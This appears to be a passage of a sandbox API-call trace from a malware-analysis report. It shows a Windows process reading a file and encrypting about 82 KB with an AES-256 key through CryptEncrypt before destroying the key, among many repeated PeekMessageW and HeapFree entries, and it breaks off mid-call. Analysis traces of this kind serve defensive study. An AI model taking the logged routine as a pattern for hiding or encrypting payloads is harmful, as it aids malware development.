lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.519] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0194.519] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0194.530] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x418f, lpOverlapped=0x0) returned 1 [0194.531] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0194.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0194.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0194.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0194.534] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.534] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.534] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.534] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0194.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0194.534] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.535] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.535] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0194.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0194.535] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.535] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0194.535] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.535] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.535] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0194.535] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0194.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.535] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c26a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0194.535] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.535] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.536] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.536] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.536] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.536] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0194.536] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.536] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.536] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0194.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0194.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0194.536] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.536] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0194.536] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0194.536] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0194.536] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.536] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0194.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0194.536] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.537] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0194.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0194.537] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.537] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.537] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.537] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0194.537] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.537] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0194.537] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.538] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.538] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1418f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x14190) returned 1 [0194.538] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.538] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0194.538] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.538] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.546] CharLowerBuffW (in: lpsz="byte[82321]", cchLength=0xb | out: lpsz="byte[82321]") returned 0xb [0194.546] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.548] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.548] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0194.549] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.551] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa87338*, pdwDataLen=0x87e820*=0x1418f, dwBufLen=0x14190 | out: pbData=0xa87338*, pdwDataLen=0x87e820*=0x14190) returned 1 [0194.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0194.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.555] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.555] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.555] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.555] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0194.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0194.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0194.556] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.556] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0194.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0194.556] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.556] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0194.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0194.556] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.556] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0194.556] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0194.556] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0194.556] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0194.556] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.567] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.567] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0194.567] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.575] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.575] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.575] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0194.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0194.576] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0194.576] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0194.576] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0194.576] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.576] CryptDestroyKey (hKey=0x90af18) returned 1 [0194.576] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0194.576] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0194.577] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0194.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0194.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0194.577] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0194.577] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0194.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0194.577] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0194.577] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0194.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0194.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0194.577] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0194.577] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0194.577] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0194.577] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0194.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0194.577] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0194.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0194.577] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0194.577] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0194.578] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.578] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0194.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0194.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0194.578] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0194.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0194.578] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.578] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0194.578] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.578] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0194.579] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.579] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0194.579] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0194.579] HeapFree (in: hHeap=0x8a0000, 